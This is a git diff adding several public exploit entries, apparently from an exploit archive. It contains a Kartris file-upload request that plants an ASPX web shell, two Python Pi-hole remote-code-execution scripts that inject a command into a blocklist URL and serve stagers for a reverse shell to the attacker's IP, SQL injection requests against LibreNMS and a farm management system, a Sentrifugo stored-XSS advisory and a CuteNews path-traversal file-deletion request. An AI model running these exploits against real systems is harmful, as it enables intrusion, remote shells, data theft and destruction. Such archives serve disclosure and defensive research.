diff --git a/exploits/aspx/webapps/48445.txt b/exploits/aspx/webapps/48445.txt new file mode 100644 index 000000000..d5ef619b2 --- /dev/null +++ b/exploits/aspx/webapps/48445.txt @@ -0,0 +1,111 @@ +# Exploit Title: Kartris 1.6 - Arbitrary File Upload +# Dork: N/A +# Date: 2020-05-08 +# Exploit Author: Nhat Ha - Sun CSR +# Vendor Homepage: https://www.cactusoft.com/ +# Software Link: https://www.kartris.com/ +# Version: 1.6 +# Category: Webapps +# Tested on: WiN10_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: https://localhost/Admin/_GeneralFiles.aspx +# +POST /Admin/_GeneralFiles.aspx HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 +Firefox/76.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------9604487443072642880454762058 +Content-Length: 18484 +Origin: 192.168.1.1 +Connection: close +Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx +Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096; +ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w; +KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx +Upgrade-Insecure-Requests: 1 + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="scrManager_HiddenField" + +;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral, +PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1; +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; +name="_UC_CategoryMenu_tvwCategory_ExpandState" + +cccccccccc +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; +name="_UC_CategoryMenu_tvwCategory_SelectedNode" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; +name="_UC_CategoryMenu_tvwCategory_PopulateLog" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$scrManager" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$phdMain$filUploader"; +filename="malicious.aspx" +Content-Type: text/plain + +[Content Malicious File Here ! ] + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth" + +170px +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth" + +500px +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__EVENTTARGET" + +ctl00$phdMain$lnkUpload +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__EVENTARGUMENT" + + +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__VIEWSTATE" + +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 +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" + +54DD7DF0 +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED" + + +-----------------------------9604487443072642880454762058-- + + +# Access malicious file following the link: +https://localhost/uploads/General/malicious.aspx +# How to fix: Update the latest version +# Commit fix: +https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c \ No newline at end of file diff --git a/exploits/linux/webapps/48442.py b/exploits/linux/webapps/48442.py new file mode 100755 index 000000000..e6bad5469 --- /dev/null +++ b/exploits/linux/webapps/48442.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python3 + +# Pi-hole <= 4.4 RCE +# Author: Nick Frichette +# Homepage: https://frichetten.com +# +# Note: This exploit must be run with root privileges and port 80 must not be occupied. +# While it is possible to exploit this from a non standard port, for the sake of +# simplicity (and not having to modify the payload) please run it with sudo privileges. +# Or setup socat and route it through there? + +import requests +import sys +import socket +import _thread +import time + +if len(sys.argv) < 4: + print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*") + print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.") + exit() + +SESSION = dict(PHPSESSID=sys.argv[1]) +TARGET_IP = sys.argv[2] +LOCAL_IP = sys.argv[3] +LOCAL_PORT = sys.argv[4] + +if len(sys.argv) == 6: + ROOT = True + +# Surpress https verify warnings +# I'm asuming some instances will use self-signed certs +requests.packages.urllib3.disable_warnings() + +# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet +# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell. +payload = """ +""" %(LOCAL_IP, LOCAL_PORT) + +def send_response(thread_name): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.bind((LOCAL_IP,int(80))) + sock.listen(5) + + connected = False + while not connected: + conn,addr = sock.accept() + if thread_name == "T1": + print("[+] Received First Callback") + conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") + else: + print("[+] Received Second Callback") + print("[+] Uploading Payload") + conn.sendall(bytes(payload, "utf-8")) + conn.close() + connected = True + + sock.close() + +_thread.start_new_thread(send_response,("T1",)) + + +# Fetch token +resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False) +response = str(resp.content) +token_loc = response.find("name=\"token\"") +token = response[token_loc+20:token_loc+64] + + +# Make request with token +data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} +resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) +if resp.status_code == 200: + print("[+] Put Stager Success") + + +# Update gravity +resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) + + +time.sleep(3) +_thread.start_new_thread(send_response,("T2",)) + + +# Update again to trigger upload +resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) + +print("[+] Triggering Exploit") +try: + requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False) +except: + # We should be silent to avoid filling the cli window + None \ No newline at end of file diff --git a/exploits/linux/webapps/48443.py b/exploits/linux/webapps/48443.py new file mode 100755 index 000000000..51f4dc944 --- /dev/null +++ b/exploits/linux/webapps/48443.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python3 + +# Pi-hole <= 4.4 RCE +# Author: Nick Frichette +# Homepage: https://frichetten.com +# +# Note: This exploit must be run with root privileges and port 80 must not be occupied. +# While it is possible to exploit this from a non standard port, for the sake of +# simplicity (and not having to modify the payload) please run it with sudo privileges. +# Or setup socat and route it through there? + +import requests +import sys +import socket +import _thread +import time + +if len(sys.argv) < 4: + print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*") + print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.") + exit() + +SESSION = dict(PHPSESSID=sys.argv[1]) +TARGET_IP = sys.argv[2] +LOCAL_IP = sys.argv[3] +LOCAL_PORT = sys.argv[4] + +# Surpress https verify warnings +# I'm asuming some instances will use self-signed certs +requests.packages.urllib3.disable_warnings() + +# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet +# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell. +shell_payload = """ +""" %(LOCAL_IP, LOCAL_PORT) + +root_payload = """ +""" + +def send_response(thread_name): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.bind((LOCAL_IP,int(80))) + sock.listen(5) + + connected = False + while not connected: + conn,addr = sock.accept() + if thread_name == "T1": + print("[+] Received First Callback") + conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") + elif thread_name == "T2": + print("[+] Received Second Callback") + print("[+] Uploading Root Payload") + conn.sendall(bytes(root_payload, "utf-8")) + elif thread_name == "T3": + print("[+] Received Third Callback") + conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") + else: + print("[+] Received Fourth Callback") + print("[+] Uploading Shell Payload") + conn.sendall(bytes(shell_payload, "utf-8")) + conn.close() + connected = True + + sock.close() + +_thread.start_new_thread(send_response,("T1",)) + + +# Fetch token +resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False) +response = str(resp.content) +token_loc = response.find("name=\"token\"") +token = response[token_loc+20:token_loc+64] + + +# Make request with token +data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} +resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) +if resp.status_code == 200: + print("[+] Put Root Stager Success") + + +# Update gravity +resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) + +time.sleep(3) +_thread.start_new_thread(send_response,("T2",)) + + +# Update again to trigger upload of root redirect +resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) + +time.sleep(1) +_thread.start_new_thread(send_response,("T3",)) + +data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} +resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) +if resp.status_code == 200: + print("[+] Put Shell Stager Success") + +resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) + +time.sleep(1) +_thread.start_new_thread(send_response,("T4",)) + +resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) + + +print("[+] Triggering Exploit") +try: + requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False) +except: + # We should be silent to avoid filling the cli window + None \ No newline at end of file diff --git a/exploits/multiple/webapps/48453.txt b/exploits/multiple/webapps/48453.txt new file mode 100644 index 000000000..f9b61877b --- /dev/null +++ b/exploits/multiple/webapps/48453.txt @@ -0,0 +1,55 @@ +# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection +# Google Dork:unknown +# Date: 2019-09-01 +# Exploit Author: Punt +# Vendor Homepage: https://www.librenms.org +# Software Link: https://www.librenms.org +# Version:1.46 and less +# Tested on:Linux and Windows +# CVE: N/A + +#Affected Device: more than 4k found on Shodan and Censys. + +#Description about the bug +Vunlerable script /html/ajax_serarch.php + +if (isset($_REQUEST['search'])) { + $search = mres($_REQUEST['search']); + header('Content-type: application/json'); + if (strlen($search) > 0) { + $found = 0; + + if ($_REQUEST['type'] == 'group') { + include_once '../includes/device-groups.inc.php'; + foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) { + if ($_REQUEST['map']) { + $results[] = array( + 'name' => 'g:'.$group['name'], + 'group_id' => $group['id'], + + +as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST[''] + +dbFetchRows() used to exectute sql query + +now lets check the mres() function + +the mres() fuction is located under /includes/common.php + +function mres($string) +{ + return $string; // + global $database_link; + return mysqli_real_escape_string($database_link, $string); + +as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%' + + +#POC: +1st lgoin to your LibreNMS +2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules +3rd you will see an sql syntax error + +The Librenms team have applyed a patch . +Thanks +Punt (From Ethiopia) \ No newline at end of file diff --git a/exploits/php/webapps/48244.txt b/exploits/php/webapps/48244.txt index 9edd4d31c..7122bec86 100644 --- a/exploits/php/webapps/48244.txt +++ b/exploits/php/webapps/48244.txt @@ -6,7 +6,7 @@ # Software Link: https://en.ulicms.de/current_versions.html # Version: 2020.1 # Tested on: Windows -# CVE : N/A +# CVE : CVE-2020-12704 ### Vulnerability : Stored Cross-Site Scripting diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt index 01f7d3944..44d905674 100644 --- a/exploits/php/webapps/48250.txt +++ b/exploits/php/webapps/48250.txt @@ -7,7 +7,7 @@ https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php # Version: 4.5.0 # Tested on: Windows -# CVE : N/A +# CVE : CVE-2020-12707 ### Vulnerability : Persistent Cross-Site Scripting diff --git a/exploits/php/webapps/48404.txt b/exploits/php/webapps/48404.txt index 36428e78b..54a6f9ee3 100644 --- a/exploits/php/webapps/48404.txt +++ b/exploits/php/webapps/48404.txt @@ -6,7 +6,7 @@ # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30 # Version: 9.03.50 # Tested on: Windows -# CVE : N/A +# CVE : CVE-2020-12706 ### Vulnerability : Persistent Cross-Site Scripting diff --git a/exploits/php/webapps/48444.txt b/exploits/php/webapps/48444.txt new file mode 100644 index 000000000..358753c78 --- /dev/null +++ b/exploits/php/webapps/48444.txt @@ -0,0 +1,48 @@ +# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection +# Date: 2020-05-06 +# Exploit Author: Tarun Sehgal +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +--------------------------------------------------------------------------------- + +#parameter Vulnerable: uname +# Injected Request +#Below request will print database name and MariaDB version. + +POST /fms/Login/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 204 +Origin: http://localhost +Connection: close +Referer: http://localhost/fms/index.php +Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco +Upgrade-Insecure-Requests: 1 + +uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1 + + + +----------------------------------------------------------------------------------------------------------------------------- +#Response +HTTP/1.1 302 Found +Date: Wed, 06 May 2020 13:21:36 GMT +Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5 +X-Powered-By: PHP/7.4.5 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +location: error.php +Content-Length: 356 +Connection: close +Content-Type: text/html; charset=UTF-8 + + +Warning: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in \ No newline at end of file diff --git a/exploits/php/webapps/48446.txt b/exploits/php/webapps/48446.txt new file mode 100644 index 000000000..4483f8ccf --- /dev/null +++ b/exploits/php/webapps/48446.txt @@ -0,0 +1,148 @@ +# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting +# Dork: N/A +# Date: 2020-05-06 +# Exploit Author: Vulnerability-Lab +# Vendor: http://www.sentrifugo.com/ +# Link: http://www.sentrifugo.com/download +# Version: 3.2 +# Category: Webapps +# CVE: N/A + +Document Title: +=============== +Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2229 + + +Product & Service Introduction: +=============================== +http://www.sentrifugo.com/ +http://www.sentrifugo.com/download + + +Affected Product(s): +==================== +Sentrifugo +Product: Sentrifugo v3.2 - CMS (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-05-05: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Mahara v19.10.2 CMS web-application series. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The persistent vulnerability is located in the `expense_name` parameters +of the `/expenses/expenses/edit` module in the `index.php` file. +Remote attackers with low privileges are able to inject own malicious +persistent script code as expenses entry. The injected code can +be used to attack the frontend or backend of the web-application. The +request method to inject is POST and the attack vector is located +on the application-side. Entries of expenses can be reviewed in the +backend by higher privileged accounts as well. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] index.php/expenses/expenses/edit + +Vulnerable Input(s): +[+] Expenses Name + +Vulnerable File(s): +[+] index.php + +Vulnerable Parameter(s): +[+] expense_name + +Affected Module(s): +[+] index.php/expenses/expenses + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +PoC: Vulnerable Source +
+ + + + + +--- PoC Session Logs [POST] --- (Expenses Inject) +http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit +Host: sentrifugo.localhost:8080 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 352 +Origin: http://sentrifugo.localhost:8080 +Connection: keep-alive +Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit +Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87; +_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443 +id=&limit=&offset=¶meter=all¤cyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=& +expense_name=&category_id=&project_id=&expense_date=&expense_currency_id=2& +expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save +- +POST: HTTP/1.1 200 OK +Server: Apache/2.2.22 (Ubuntu) +X-Powered-By: PHP/5.3.10-1ubuntu3.10 +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 19284 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html + + +Reference(s): +http://sentrifugo.localhost:8080/index.php +http://sentrifugo.localhost:8080/index.php/expenses +http://sentrifugo.localhost:8080/index.php/expenses/expenses/ +http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/php/webapps/48447.txt b/exploits/php/webapps/48447.txt new file mode 100644 index 000000000..16134af4c --- /dev/null +++ b/exploits/php/webapps/48447.txt @@ -0,0 +1,37 @@ +# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion +# Date: 2020-05-08 +# Author: Besim ALTINOK +# Vendor Homepage: https://cutephp.com +# Software Link: https://cutephp.com/click.php?cutenews_latest +# Version: v2.1.2 (Maybe it affect other versions) +# Tested on: Xampp +# Credit: İsmail BOZKURT +# Remotely: Yes + +Description: +------------------------------------------------------------------------ +In the "Media Manager" area, users can do arbitrarily file deletion. +Because the developer did not use the unlink() function as secure. So, can +be triggered this vulnerability by a low user account + + +Arbitrary File Deletion PoC +-------------------------------------------------------------------------------- + +POST /cute/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 ********************************** +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 222 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/cute/index.php +Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022 +Upgrade-Insecure-Requests: 1 + +mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete \ No newline at end of file diff --git a/exploits/php/webapps/48450.txt 